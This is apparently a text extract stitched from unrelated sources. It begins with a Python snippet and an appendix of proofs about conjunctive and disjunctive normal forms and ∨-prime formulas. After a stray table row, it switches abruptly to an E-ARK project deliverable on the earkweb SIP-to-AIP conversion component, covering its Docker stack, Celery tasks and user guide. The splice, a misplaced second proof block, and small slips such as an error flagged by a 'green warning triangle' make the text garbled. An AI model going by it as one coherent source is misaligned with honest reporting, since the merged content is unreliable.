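    return all(any(leq(a, b) for a in As) for b in Bs)

def leq_disj(As, Bs, leq):
    # \/ As <= \/ Bs  iff  forall i exists j, A_i <= B_j
    return all(any(leq(a, b) for b in Bs) for a in As)

divides = lambda a, b: b % a == 0  # toy base preorder: a <= b iff a divides b

print(leq_conj([2, 3], [6], divides))     # True: 6 is above 2 (and above 3)
print(leq_disj([2, 3], [4, 9], divides))  # True: 2 <= 4 and 3 <= 9
print(leq_disj([5], [4, 9], divides))     # False: 5 is below neither disjunct
```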
Lemma A.2 $\leq_i$ $(i = \rightarrow, \land, \lor, \land\lor, \lor\land)$ are reflexive and transitive.
Proof: By induction on the definition of $\leq_i$.
The following proposition states that conjunctive/disjunctive normal forms are logically equivalent to their counterimages under $m_{\land\lor}()$ and $m_{\lor\land}()$, and that the specialised relations $\leq_i$ are actually restrictions of $\leq$ to the sets $T_i$ respectively.
Proposition A.3 For all $A, B \in L$:
i) $A \sim m_{\land\lor}(A) \sim m_{\lor\land}(A)$.
ii) $A, B \in T_i,\; A \leq_i B \Rightarrow A \leq B$ for $i = \rightarrow, \land, \lor, \land\lor, \lor\land$.
iii) $A \leq B \iff m_{\land\lor}(A) \leq_{\land\lor} m_{\land\lor}(B) \iff m_{\lor\land}(A) \leq_{\lor\land} m_{\lor\land}(B)$.
Proof: i) By induction on $A$. E.g. if $A = B \rightarrow C$ then, by induction hypothesis, we have $B \sim m_{\lor\land}(B) = \lor_{i \in I} B_i$ and $C \sim m_{\land\lor}(C) = \land_{j \in J} C_j$, so that, by repeated uses of (A7), (A8), (R4) and (R5) we conclude that
$$B \rightarrow C \sim \lor_{i \in I} B_i \rightarrow \land_{j \in J} C_j \sim \land_{i \in I} \land_{j \in J} (B_i \rightarrow C_j) \sim m_{\land\lor}(B \rightarrow C) = m_{\lor\land}(B \rightarrow C).$$
Proof: Let
\[ m_{\land\lor}(A) \leq_{\land\lor} m_{\land\lor}(B) \Rightarrow \forall j \in J\, \exists i \in I\, \forall p \in I_i\, \exists q \in J_j,\; A_{ip} \leq B_{jq}, \]
where \( m_{\land\lor}(A) = \land_{i \in I} A_i \) with \( A_i = \lor_{p \in I_i} A_{ip} \), and \( m_{\land\lor}(B) = \land_{j \in J} B_j \) with \( B_j = \lor_{q \in J_j} B_{jq} \).
Similarly,
\[ m_{\land\lor}(C) \leq_{\land\lor} m_{\land\lor}(D) \Rightarrow \forall l \in L\, \exists k \in K\, \forall r \in K_k\, \exists s \in L_l,\; C_{kr} \leq D_{ls}, \]
where \( m_{\land\lor}(C) = \land_{k \in K} C_k \) with \( C_k = \lor_{r \in K_k} C_{kr} \), and \( m_{\land\lor}(D) = \land_{l \in L} D_l \) with \( D_l = \lor_{s \in L_l} D_{ls} \).
Then we have
\[ \forall j \in J, l \in L\; [\, \exists i \in I\, \forall p \in I_i\, \exists q \in J_j,\; A_{ip} \leq B_{jq} \;\text{ and }\; \exists k \in K\, \forall r \in K_k\, \exists s \in L_l,\; C_{kr} \leq D_{ls} \,] \]
\[ \Rightarrow \forall j \in J, l \in L\; [\, \exists i \in I, k \in K,\; \lor_{p \in I_i} A_{ip} \lor \lor_{r \in K_k} C_{kr} \leq_\lor \lor_{q \in J_j} B_{jq} \lor \lor_{s \in L_l} D_{ls} \,] \]
\[ \Rightarrow \forall j \in J, l \in L\; [\, \exists i \in I, k \in K,\; A_i \lor C_k \leq_\lor B_j \lor D_l \,] \]
\[ \Rightarrow m_{\land\lor}(A \lor C) = \land_{i \in I, k \in K} (A_i \lor C_k) \leq_{\land\lor} \land_{j \in J, l \in L} (B_j \lor D_l) = m_{\land\lor}(B \lor D). \]
We come eventually to the proof of Theorem 2.6.
**Theorem A.4 (Properties of \( \lor \)-prime formulas)**
i) \( \nu \) and any propositional variable are \( \lor \)-prime.
ii) The formula \( \land_{i \in I} (A_i \rightarrow B_i) \) is \( \lor \)-prime for all (finite) \( I \) and formulas \( A_i, B_i \).
iii) If \( m_{\lor \land}(A) = \lor_{i \in I} A_i \) then \( A_i \) is \( \lor \)-prime, for all \( i \in I \).
iv) \( B \rightarrow C \not\sim \nu \) for all \( B, C \).
v) \( \land_{i \in I} (A_i \rightarrow B_i) \leq C \rightarrow D \) and \( C \) is \( \lor \)-prime imply \( C \leq \land_{i \in J} A_i \) and \( \land_{i \in J} B_i \leq D \) for some \( J \subseteq I \).
Proof: i) Let \( A \in \mathcal{PV} \cup \{ \nu \} \), and suppose that \( A \leq B \lor C \). Then \( m_{\lor \land}(A) = A \), while
\[ m_{\lor \land}(B \lor C) = \lor_{j \in J} B_j \lor \lor_{k \in K} C_k, \]
where \( m_{\lor \land}(B) = \lor_{j \in J} B_j \) and \( m_{\lor \land}(C) = \lor_{k \in K} C_k \). By Proposition A.3 (iii), we have \( A \leq_{\lor\land} \lor_{j \in J} B_j \lor \lor_{k \in K} C_k \), so that, by Definition A.1, \( A \leq_\land B_j \) or \( A \leq_\land C_k \) for some \( j, k \); then \( A \leq B_j \leq B \) or \( A \leq C_k \leq C \) by Proposition A.3 (i) and (ii).
ii) By Proposition A.3 (iii) we have:
\[ \land_{i \in I} (A_i \rightarrow B_i) \leq C \lor D \iff m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \leq_{\lor\land} m_{\lor \land}(C \lor D). \]
Now \( m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \) is a conjunction of arrows, namely a formula with no disjunction at the top level; on the other hand \( m_{\lor \land}(C \lor D) \) has the form \( \lor_{k \in K} C_k \lor \lor_{l \in L} D_l \). By definition of \( \leq_{\lor \land} \), we immediately have that \( m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \leq_\land C_k \) for some \( k \), or \( m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \leq_\land D_l \) for some \( l \); therefore the thesis follows by Proposition A.3 (i) and (ii).
iii) Parts (i) and (ii) imply that any formula in \( T_{\land} \) is \( \lor \)-prime: hence the thesis follows by the definition of \( m_{\lor \land}(\cdot) \).
iv) By contraposition. Suppose that \( \nu \leq B \rightarrow C \); then, by Proposition A.3 (iii), \( \nu \leq_{\lor\land} m_{\lor \land}(B \rightarrow C) = \land_{i \in I, j \in J} (B_i \rightarrow C_j) \). This implies that there exist \( i \) and \( j \) such that \( \nu \leq_\rightarrow B_i \rightarrow C_j \), which is impossible.
v) We first compute:
\[ m_{\lor\land}(\land_{i \in I} (A_i \rightarrow B_i)) = \land_{i \in I} \land_{h \in H_i} \land_{l \in L_i} (A_{ih} \rightarrow B_{il}), \]
where \( m_{\lor\land}(A_i) = \lor_{h \in H_i} A_{ih} \) and \( m_{\land\lor}(B_i) = \land_{l \in L_i} B_{il} \). On the other hand, \( m_{\lor\land}(C \rightarrow D) = \land_{p \in P} \land_{q \in Q} (C_p \rightarrow D_q) \), where \( m_{\lor\land}(C) = \lor_{p \in P} C_p \) and \( m_{\land\lor}(D) = \land_{q \in Q} D_q \). By Proposition A.3 (iii) and the definition of \( \leq_{\lor\land} \) we have
$$\forall p \in P, q \in Q\; \exists i \in I, h \in H_i, l \in L_i,\;\; C_p \leq_\land A_{ih} \;\text{ and }\; B_{il} \leq_\lor D_q.$$
By Proposition A.3 (i), $C \sim \bigvee_{p \in P} C_p$: hence, since $C$ is $\vee$-prime, there exists $p \in P$ such that $C \leq C_p$. Choose one such $p$ and, for any $q \in Q$, define
$$J_q = \{ i \in I \mid \exists h \in H_i, l \in L_i,\; C_p \leq_\land A_{ih} \;\text{ and }\; B_{il} \leq_\lor D_q \},$$
which is non-empty by the above statement. Finally, we take $J = \bigcup_{q \in Q} J_q$. Now, for all $i \in J$, there exists $h \in H_i$ such that $C_p \leq A_{ih} \leq A_i$: therefore $C \leq C_p \leq \wedge_{i \in J} A_i$.
To conclude, for all $q \in Q$ there is $i \in J_q$ and $l \in L_i$ such that $B_i \leq B_{i,l} \leq D_q$: then $\wedge_{i \in J} B_i \leq D_q$ for all $q$, and, therefore, $\wedge_{i \in J} B_i \leq \wedge_{q \in Q} D_q \sim D$.
</tr>
<tr>
<td>Release Date:</td>
<td>14th February 2018</td>
</tr>
</tbody>
</table>
Contributors
<table>
<thead>
<tr>
<th>Name</th>
<th>Affiliation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Sven Schlarb</td>
<td>Austrian Institute of Technology</td>
</tr>
<tr>
<td>Jan Rörden</td>
<td>Austrian Institute of Technology</td>
</tr>
<tr>
<td>Mihai Bartha</td>
<td>Austrian Institute of Technology</td>
</tr>
<tr>
<td>Kuldar Aas</td>
<td>National Archives of Estonia</td>
</tr>
<tr>
<td>Andrew Wilson</td>
<td>University of Brighton</td>
</tr>
<tr>
<td>David Anderson</td>
<td>University of Brighton</td>
</tr>
<tr>
<td>Janet Anderson</td>
<td>University of Brighton</td>
</tr>
</tbody>
</table>
STATEMENT OF ORIGINALITY
Statement of originality:
This deliverable contains original unpublished work except where clearly indicated otherwise. Acknowledgement of previously published material and of the work of others has been made through appropriate citation, quotation or both.
# TABLE OF CONTENTS
# TABLE OF CONTENTS
1. **Scope of this document**
2. **Relation to other documents**
3. **Introduction**
4. **E-ARK Web Architecture overview**
   4.1 Cluster software stack
   4.2 Standalone software stack
5. **SIP-AIP conversion component**
   5.1 Task execution framework
   5.2 SIP-AIP conversion tasks
6. **E-ARK Web user guide**
   6.1 SIP Creator
   6.1.1 Initialise SIP package creation
   6.1.2 Adding files to the SIP
   6.1.3 SIP creation process
   6.2 SIP to AIP conversion
   6.2.1 Start SIP to AIP conversion process
List of Figures
Figure 1: The scope of this document is Deliverable D4.4 Part B
Figure 2: Screenshot of the initial page of the web application E-ARK Web
Figure 3: Architecture overview of the full-scale version of E-ARK Web
Figure 4: Architecture overview of the lightweight version of E-ARK Web
Figure 5: Docker containers of the Standalone Software Stack and the main links between the containers
Figure 6: Origin of the images which are the basis to run the Docker containers
Figure 7: Data directories of the Docker containers and mapping to directories of the host file system
Figure 8: Parent-child aggregation submission process
List of Tables
Table 1 Docker containers of the standalone deployment stack
Table 2 SIP-AIP conversion tasks
Executive Summary
This deliverable D4.4 Part B is the second part of deliverable D4.4 and describes the SIP-AIP conversion component in its final version. The first part D4.4 Part A is an update of the previous deliverable D4.3 and represents the final version of the AIP specification. Figure 1 illustrates the two parts A and B of deliverable 4.4 and highlights Part B as the scope of the present document.
This document focuses on the E-ARK reference implementation of the SIP-AIP conversion component and describes the implementation of the basic concepts and definitions. The deliverable is a follow-up version of E-ARK deliverable D4.3 “E-ARK AIP pilot specification”.
The SIP-AIP conversion component is the reference implementation of the AIP format specification and is an integral part of the web application E-ARK Web (or in short: earkweb). The SIP-AIP conversion component consists of a set of individual tasks which are executed in a specific order to convert an E-ARK submission information package (SIP) into the E-ARK archival information package (AIP).
---
1 http://eark-project.com/resources/project-deliverables/53-d43earkaipspec-1
2 https://github.com/eark-project/earkweb; the actual SIP to AIP conversion component consists of a set of tasks in https://github.com/eark-project/earkweb/blob/master/workers/tasks.py.
1 Scope of this document
This document describes the SIP-AIP conversion component as part of the reference implementation E-ARK Web (in short: earkweb).³ It describes a set of tasks which is used to convert an E-ARK SIP to an E-ARK AIP and explains how these tasks are employed by the web application frontend of earkweb. In order to explain the context in which the SIP-AIP component is embedded, some details about the architecture and a user guide to the earkweb reference implementation are given.
2 Relation to other documents
This document describes how the SIP-AIP conversion is implemented as part of the component earkweb.⁴ It complements part A “AIP format specification” of deliverable D4.4, “Final version of SIP-AIP conversion component”.⁵
Deliverable D4.4 has two previous iterations, Deliverable D4.2⁶ and Deliverable D4.3.⁶
The SIP-AIP conversion component was designed to integrate with the scalable, Hadoop-based back-end implementation. The deliverable D6.3 “Data Mining Showcase” includes a detailed overview of the updated architecture of the Integrated Platform Reference Implementation (IPRIP). The SIP specification is described in the D3.x deliverables.
The fundamental document to understand the purpose of the SIP-AIP conversion is the Reference Model for an Open Archival Information System (OAIS).⁷
3 Introduction
earkweb is an open source archiving and digital preservation system. It is OAIS⁸-oriented which means that data ingest, archiving and dissemination functions operate on information packages bundling content and...
metadata in contiguous containers. The information package format uses METS\(^9\) to represent the structure and PREMIS\(^{10}\) to record digital provenance information.
---
\(^9\) [http://www.loc.gov/standards/mets](http://www.loc.gov/standards/mets)
\(^{10}\) [http://www.loc.gov/standards/premis](http://www.loc.gov/standards/premis)
Earkweb consists of a frontend web application together with a task execution system based on Celery\textsuperscript{11} which allows synchronous and asynchronous processing of information packages by means of processing units which are called “tasks”.
The backend can also be controlled via remote command execution without using the web frontend. The outcomes of operations performed by a task are stored immediately so that the status information in the frontend’s database can be updated afterwards.
The SIP to AIP conversion component is implemented as a set of backend Celery tasks. These tasks can be executed using the web application frontend or by invoking the tasks in headless mode. Earkweb also offers a pre-defined workflow for batch processing which executes the full chain of tasks for automatic SIP-AIP conversion. These alternatives will be explained in detail throughout this document.
4 E-ARK Web Architecture overview
4.1 Cluster software stack
The E-ARK Web architecture is designed for efficiently processing, storing, and accessing very large data collections in terms of scalability, reliability, and cost. The system makes use of technologies like the Apache Hadoop\textsuperscript{12} framework, NGDATA’s Lily\textsuperscript{13} repository, and the Apache SolR\textsuperscript{14} search server allowing the repository infrastructure to scale out horizontally. Using Hadoop, the number of nodes in a cluster is virtually unlimited and clusters may range from single node installations to clusters comprising thousands of computers. The diagram in Figure 3 gives an overview of this architecture.
\textsuperscript{11} http://www.celeryproject.org/
\textsuperscript{12} http://hadoop.apache.org/
\textsuperscript{13} https://github.com/NGDATA/lilyproject
\textsuperscript{14} http://lucene.apache.org/solr/
The user interface, represented by the box on top of the diagram, is a Python/Django-based web application which allows managing the creation and transformation of information packages. It supports the complete archival package transformation pipeline: beginning with the creation of the Submission Information Package (SIP), continuing with the conversion to an Archival Information Package (AIP), and ending with the creation of the Dissemination Information Package (DIP) which is used to disseminate digital objects to the requesting user. Tasks can be assigned to Celery workers (green boxes with a "C") which share the same storage area, and the result of the package transformation is stored in the working directory.
Once the creation of information packages is finished, they can be deployed to the Lily access repository. Lily is built on top of HBase, a NoSQL database that is running on top of Hadoop. Lily defines some data types most of which are based on existing Java data types. Lily records are defined using these data types rather
15 https://hbase.apache.org/
than using plain HBase tables, which makes them better suited for indexing due to a richer data model. The Lily Indexer is the component which sends the data to the Solr server and keeps the index synchronized with the Lily repository. Solr neither reads data from HDFS\textsuperscript{16} nor writes data to HDFS. The index is stored on the local file system and optionally distributed over multiple cluster nodes if index sharding (mechanism used to spread load on databases across multiple servers) or replication is used.
4.2 Standalone software stack
There is also a lightweight version of E-ARK Web where the large-scale storage backend (HDFS, HBase) is replaced by a conventional file system storage and the SolR search server is a single instance of SolR instead of a SolR Cloud deployment, as illustrated by the diagram in Figure 4.
\textbf{Figure 4: Architecture overview of the lightweight version of E-ARK Web}
The standalone version of the IPRIP e-archiving environment has been made available using a container-based
\textsuperscript{16}“Hadoop Distributed File System (HDFS) is designed to reliably store very large files across machines in a large cluster.”, https://wiki.apache.org/hadoop/HDFS
deployment model based on Docker\textsuperscript{17} in order to support simple and modular installation of the software.
Docker is an open-source engine that automates the deployment of any application as a lightweight and portable container that will run on any platform where the Docker engine is supported.\textsuperscript{18} In order to allow deploying IPRIP services on a Docker platform, Docker containers for the individual services of \textit{earkweb}'s frontend and backend have been created.
Table 1 shows the software module and the corresponding image which is used in a Docker deployment. The left column designates the software module and the right column indicates the image which is used to create and run a container to provide the corresponding service.
<table>
<thead>
<tr>
<th>Software module</th>
<th>Docker image</th>
</tr>
</thead>
<tbody>
<tr>
<td>MySQL\textsuperscript{19}</td>
<td>earkdbimg\textsuperscript{20}</td>
</tr>
<tr>
<td>SolR\textsuperscript{21}</td>
<td>Solr\textsuperscript{22}</td>
</tr>
<tr>
<td>RabbitMQ\textsuperscript{23}</td>
<td>tutum/rabbitmq\textsuperscript{24}</td>
</tr>
<tr>
<td>Redis\textsuperscript{25}</td>
<td>tutum/redis\textsuperscript{26}</td>
</tr>
<tr>
<td>E-ARK Web\textsuperscript{27}</td>
<td>earkwebimg\textsuperscript{28}</td>
</tr>
<tr>
<td>Celery\textsuperscript{29}</td>
<td>earkwebimg</td>
</tr>
<tr>
<td>Celery Flower\textsuperscript{30}</td>
<td>earkwebimg</td>
</tr>
</tbody>
</table>
\textit{Table 1 Docker containers of the standalone deployment stack}
Docker Compose\textsuperscript{31} is used to run the components listed in Table 1 as multi-container Docker applications. Docker Compose allows automatically retrieving or building required images and containers as well as controlling start up and shut down of multiple inter-dependent services. Docker Compose also allows the linking of services to make inter-service communication easier. Figure 5 shows the YAML file which defines
\textsuperscript{17} https://www.docker.com
\textsuperscript{18} https://docs.docker.com/engine/installation
\textsuperscript{19} http://www.mysql.com
\textsuperscript{20} Based on earkweb image created from http://github.com/eark-project/earkweb
\textsuperscript{21} https://lucene.apache.org/solr
\textsuperscript{22} https://hub.docker.com/l/solr
\textsuperscript{23} http://www.rabbitmq.com
\textsuperscript{24} https://hub.docker.com/r/tutum/rabbitmq
\textsuperscript{25} http://redis.io
\textsuperscript{26} https://github.com/tutumcloud/redis
\textsuperscript{27} http://github.com/eark-project/earkweb
\textsuperscript{28} https://github.com/eark-project/earkweb/blob/master/Dockerfile
\textsuperscript{29} http://www.celeryproject.org
\textsuperscript{30} https://github.com/mher/flower
\textsuperscript{31} https://github.com/docker/compose
the service composition so the services can be run together in an isolated environment. The dotted lines are used to visually divide the YAML file according to the different services it defines.
To give one example, the first service, named ‘db’, provides the MySQL database service needed by the earkweb frontend web application to store basic information about the processing status of information packages. The service is defined by the following properties:
- **image**: earkdbimg – The name of the image which is used to provide the MySQL database.
- **container_name**: earkdb_1 – The name of the Docker container.
- **build**: ./docker/earkdb – The Docker file which contains the build instructions to create the Docker image.
- **volumes**: - /tmp/earkweb-mysql-data:/var/lib/mysql – A directory from the Host system (here: /tmp/earkweb-mysql-data) is mounted as the MySQL data directory into the Docker container (here: /var/lib/mysql).
- **ports**: - ‘3306:3306’ – The port of the application is mapped to the port where the service will be exposed (in this case the standard MySQL port 3306 will be exposed as port 3306 by the container).
Furthermore, the orange arrows in Figure 5 show how the services are linked to each other using the “links” attribute of the earkweb container to reference the required service by name or the BROKER_URL environment variable of the flower service to link to the ‘rabbitmq’ service.
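The ‘db’ service definition described above can be sketched as a Docker Compose fragment. This is a reconstruction from the listed properties, not a verbatim copy of the project’s docker-compose YAML file:

```yaml
# Reconstructed sketch of the 'db' service (MySQL) from the properties
# listed above; not a verbatim excerpt of the earkweb compose file.
db:
  image: earkdbimg            # image providing the MySQL database
  container_name: earkdb_1
  build: ./docker/earkdb      # Dockerfile with the build instructions
  volumes:
    - /tmp/earkweb-mysql-data:/var/lib/mysql   # host dir mounted as MySQL data dir
  ports:
    - "3306:3306"             # expose the standard MySQL port
```

The other services in Figure 5 follow the same pattern, with the “links” attribute (or environment variables such as BROKER_URL) wiring dependent services together.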
Figure 5 Docker containers of the Standalone Software Stack and the main links between the containers.
Figure 6 shows the origin of the images which are needed to run the various Docker containers. It shows that the Solr, RabbitMQ, and Redis images are directly retrieved from the Docker Image Library\textsuperscript{32}, and that the
\textsuperscript{32} https://hub.docker.com
other containers are based on Docker container build instructions provided in the form of Dockerfiles\textsuperscript{33} as part of the earkweb code base.\textsuperscript{34}

**Figure 6 Origin of the images which are the basis to run the Docker containers**
Finally, Figure 7 shows how various directories of the host file system are mapped to directories of the corresponding Docker containers. On the top right, there are directories of the local file system, and on the bottom right, there are directories of the Docker containers. The colours of the bounding boxes show the relationship between host file system and container directories. For example, the ‘/tmp/earkweb-mysql-data’ directory of the host file system is mapped to the ‘/var/lib/mysql’ directory of the MySQL database container. It is worth highlighting that for the containers earkweb, Celery, and Celery Flower the current directory (‘.’) –
\textsuperscript{33} https://docs.docker.com/engine/reference/builder
\textsuperscript{34} http://github.com/eark-project/earkweb
which corresponds to the `earkweb` code base – is mounted to the `/earkweb` container directory. These containers provide the different types of services (the `earkweb` frontend, the Celery task queue backend, and the Celery Flower task execution monitoring service) based on the same base image using service specific container run instructions respectively.

**Figure 7** Data directories of the Docker containers and mapping to directories of the host file system
## 5 SIP-AIP conversion component
### 5.1 Task execution framework
The SIP-AIP conversion component consists of a set of individual tasks which are executed in a specific order to convert an E-ARK submission information package (SIP) into the E-ARK archival information package (AIP). It is an extensible workflow which can be adapted to specific needs by inserting new tasks at any point of the
workflow. *earkweb* uses a modular approach for defining atomic tasks which perform a specific transformation step of the SIP-AIP conversion, such as the extraction of an SIP or the validation of the descriptive metadata it contains. However, a specific task does not necessarily execute one single action, but can initiate a series of tasks or a complete workflow as well.
Each task is implemented as a Python class and is available in the Python module “workers/tasks.py”\(^{35}\) of the *earkweb* application. A task which performs a step of the SIP-AIP conversion must extend the default task class DefaultTask defined in the module “workers/default_task.py”\(^{36}\).
The default task makes sure that the pre-conditions for executing a task are fulfilled (e.g. the package is not in an error state), and also records the task execution in the provenance metadata of the package (i.e. the PREMIS metadata file). The default task also verifies if task execution is allowed given the current state of the package. Each task has a property which defines the list of tasks which are accepted as previously executed tasks. The fact that a task is defined as an “accepted last task” means that if execution was successful, there is the assumption that it produces valid output to be used as input for the current task. For example, to execute the SIPValidation task\(^{37}\) which validates the structure of the E-ARK IP, it is a requirement that the transferred entity (the SIP’s TAR file) was extracted successfully by the SIPExtraction task.\(^{38}\)
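The “accepted last task” precondition described above can be sketched as follows. This is a minimal illustration of the pattern, not the actual earkweb implementation; the attribute and method names (other than the task names, which come from Table 2) are hypothetical:

```python
# Minimal sketch of the "accepted last task" check performed by the
# default task class. Attribute/method names are hypothetical.
class DefaultTask:
    accept_input_from = []  # tasks whose successful output we accept as input

    def can_run_after(self, last_task_name):
        """A task may only run if the previously executed task is accepted."""
        return last_task_name in self.accept_input_from


class SIPExtraction(DefaultTask):
    accept_input_from = ["IdentifierAssignment"]


class SIPValidation(DefaultTask):
    accept_input_from = ["SIPExtraction"]
```

For example, SIPValidation may run after a successful SIPExtraction (`SIPValidation().can_run_after("SIPExtraction")` is true), but not directly after SIPDeliveryValidation.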
### 5.2 SIP-AIP conversion tasks
Table 2 provides an overview of the tasks which together represent the SIP-AIP conversion component.
<table>
<thead>
<tr>
<th>Task name</th>
<th>Accepted inputs</th>
<th>Task description</th>
</tr>
</thead>
<tbody>
<tr>
<td>SIPDeliveryValidation</td>
<td>SIPValidation, SIPtoAIPReset</td>
<td>Validation of the delivery of the ZIP or TAR file against a delivery METS XML file to verify the integrity of the transferred file.</td>
</tr>
<tr>
<td>IdentifierAssignment</td>
<td>SIPDeliveryValidation</td>
<td>Assignment of a unique identifier. In the reference implementation a URN with the namespace identifier “uuid” is generated.</td>
</tr>
<tr>
<td>SIPExtraction</td>
<td>IdentifierAssignment</td>
<td>Extraction of the TAR or ZIP file containing the SIP.</td>
</tr>
<tr>
<td>SIPValidation</td>
<td>SIPExtraction</td>
<td>Validation of the structure of the SIP as well as the structural (METS) and preservation (PREMIS) metadata.</td>
</tr>
<tr>
<td>SIPRestructuring</td>
<td>SIPValidation, SIPExtraction</td>
<td>Restructuring of the SIP according to the AIP structure which encloses the SIP.</td>
</tr>
<tr>
<td>AIPDescriptiveMetadataValidation</td>
<td>AIPDescriptiveMetadataValidation, SIPRestructuring</td>
<td>Validation of descriptive metadata. In the current state, only EAD descriptive metadata is validated.</td>
</tr>
<tr>
<td>AIPMigrations</td>
<td>SIPRestructuring, AIPDescriptiveMetadataValidation, MigrationProcess, AIPMigrations, AIPCheckMigrationProgress</td>
<td>Execute AIP migrations according to defined migration rules. As examples, PDF to PDF/A and GIF to TIFF migrations are defined with corresponding tools performing the migrations.</td>
</tr>
<tr>
<td>AIPCheckMigrationProgress</td>
<td>AIPCheckMigrationProgress, AIPMigrations, MigrationProcess</td>
<td>This task can be invoked to query the migration progress.</td>
</tr>
<tr>
<td>CreatePremisAfterMigration</td>
<td>CreatePremisAfterMigration, AIPCheckMigrationProgress</td>
<td>Create PREMIS metadata after migration.</td>
</tr>
<tr>
<td>AIPRepresentationMetsCreation</td>
<td>AIPRepresentationMetsCreation, CreatePremisAfterMigration</td>
<td>Create the METS structural metadata file for each representation contained in the AIP.</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Task</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>AIPPackageMetsCreation</td>
<td>Create the AIP METS file referencing the METS files of the representations contained in the AIP.</td>
</tr>
<tr>
<td>AIPValidation</td>
<td>Validation of the structure of the AIP as well as the structural (METS) and preservation (PREMIS) metadata.</td>
</tr>
<tr>
<td>AIPPackaging</td>
<td>Packaging the AIP as a TAR file.</td>
</tr>
<tr>
<td>AIPStore</td>
<td>Store the AIP in the file system in the Pairtree storage. This is the storage area of the standalone software stack. In the cluster software stack this storage area represents the staging area holding packages which are to be uploaded to the Lily Repository.</td>
</tr>
</tbody>
</table>
### Table 2 SIP-AIP conversion tasks
\(^{35}\)https://github.com/eark-project/earkweb/blob/master/workers/tasks.py
\(^{36}\)https://github.com/eark-project/earkweb/blob/master/workers/default_task.py
\(^{37}\)https://github.com/eark-project/earkweb/blob/6be44bc8ed3d346141c7f7e4091f1069c7a467f5/workers/tasks.py#L1100
\(^{38}\)https://github.com/eark-project/earkweb/blob/6be44bc8ed3d346141c7f7e4091f1069c7a467f5/workers/tasks.py#L1059
---
39 The files are uploaded to the Hadoop Distributed File System (HDFS) of the Lily Repository. See deliverable D6.2 for details about the Lily Repository at [http://eark-project.com/resources/project-deliverables/54-d62intplatformref-1](http://eark-project.com/resources/project-deliverables/54-d62intplatformref-1)
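The identifier scheme (“a URN with the namespace identifier ‘uuid’”) and the AIPStore pairtree layout from Table 2 can be illustrated as follows. Python’s `uuid` module does produce `urn:uuid:` identifiers, but the path construction below is a reduced sketch of the pairtree scheme, not earkweb’s actual storage code:

```python
import uuid


def assign_identifier():
    """Generate a URN with the "uuid" namespace identifier, as in Table 2."""
    return uuid.uuid4().urn  # e.g. "urn:uuid:1b4db7eb-..."


def pairtree_path(identifier):
    """Map an identifier to a pairtree directory path (simplified sketch).

    Pairtree splits the cleaned identifier into two-character segments;
    real pairtree implementations also escape special characters.
    """
    cleaned = identifier.replace("urn:uuid:", "").replace("-", "")
    segments = [cleaned[i:i + 2] for i in range(0, len(cleaned), 2)]
    return "pairtree_root/" + "/".join(segments)
```

For instance, an identifier whose cleaned form is `abcdef12` would be stored under `pairtree_root/ab/cd/ef/12`.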
6 E-ARK Web user guide
6.1 SIP Creator
A Submission Information Package (SIP) – as defined in the OAIS model – is an information package that is delivered by a producer to the OAIS for use in the construction or update of one or more Archival Information Packages (AIPs).
The SIP Creator is a web-based interface allowing the creation of E-ARK Submission Information Packages (SIPs). Files can be uploaded to the corresponding sections (content, documentation and metadata) of the container and a set of tasks allows transforming the SIP into the required format.
6.1.1 Initialise SIP package creation
In this step it is required that a package name for the SIP be provided:

Create new SIP
In this step it is required to provide a package name for the SIP:
SIP package name: example
Proceed
Note that a package name must have at least 3 characters.
Click on 'Proceed' to continue with the next step.
6.1.2 Adding files to the SIP
A web form allows uploading files to the corresponding areas of the SIP.
In the E-ARK SIP, each representation - as a set of files needed to render an intellectual entity - is stored in a separate directory under the "representations" directory.
It is required that a name be given to the representation which will be used as the name of the directory where the actual data, additional documentation, and schemas can be uploaded.
To create a new representation, enter the name (at least 4 characters long) in the editable select box and click the "plus" symbol which will enable the upload area of the new representation:
To switch between existing representations choose the representation from the select box ('caret' symbol next to the "plus" symbol).
If the upload area of the representation is loaded, files can be uploaded by clicking on 'Browse ...' and selecting a file from the local file system.
A collection of files can also be packaged using the tar format and uploaded as a single file, which is automatically extracted in the upload directory.
Hover your mouse over the user interface widgets to get more information about the individual elements.
Click on the "Proceed" button to continue with the next step.
6.1.3 SIP creation process
6.1.3.1 Start SIP creation process
The SIP creation process interface allows executing SIP creation tasks:
- SIPReset
- SIPDescriptiveMetadataValidation
- SIPPackagedMetadataCreation
- SIPPackaging
- SIPClose
6.1.3.1.1 Task execution
The tasks in the pull-down menu near the label "Tasks" appear in the logical order in which they should be executed.
The "SIP creation task/workflow execution" overview table shows the information entities of the package:
- The "Package name" is the name of the SIP which is the outcome of the current SIP creation process.
- The "Process ID" is a UUID which corresponds to the name of the working area directory.
- The "Working area path" is a link which allows accessing the working area directory of the corresponding package to see the result of a task execution.
- The "Last task" shows the last task which was executed, e.g. "SIPValidation". The last task also determines the following task which can be executed because each task defines a list of accepted input tasks.
- Last change is the date/time of the last modification (by a task).
- Process status shows the consistency status of a package. If the process status shows the value "Success (0)" together with a green "check mark" symbol, then the status of the package is consistent. If an error occurred during processing, the process status shows the value "Error (1)" together with a green "warning triangle" symbol.
Selected information and error log messages appear in the "Process log" and "Error log" areas; more detailed information about the processing might be available in the earkweb processing log which is available in the package.
Use the "SIPReset" task to roll back package processing to the initial state in case an error occurred during processing (after applying required modifications).
It is possible to directly continue with the "SIP to AIP conversion" process by executing the "SIP Close" task. Note that in this case the package disappears from the "Active SIP creation processes" overview page as it is handed over to the "SIP to AIP conversion".
6.1.3.2 Active SIP creation processes overview
By accessing the sub-menu item "Active SIP creation processes", an overview about open SIP creation processes is shown. Each package is identified by the package name (column 'Package name') which was provided in the first step of the SIP creation process and an internal process identifier (column 'Process ID'). The process identifier is also used as the name of the working directory where information package transformations take place (column 'SIP creation working directory').
Depending on the last task that was executed, subsequent transformation tasks can be applied.
### 6.2 SIP to AIP conversion
The AIP – as defined in the OAIS reference model – is an information package used to transmit and/or store archival objects within a digital repository. An AIP contains both structural and descriptive metadata about the content, as well as the actual content itself.
The SIP to AIP conversion is a set of tasks that can be performed to convert an E-ARK SIP to an E-ARK AIP which must comply with both structural and metadata requirements defined by the E-ARK project.
#### 6.2.1 Start SIP to AIP conversion process
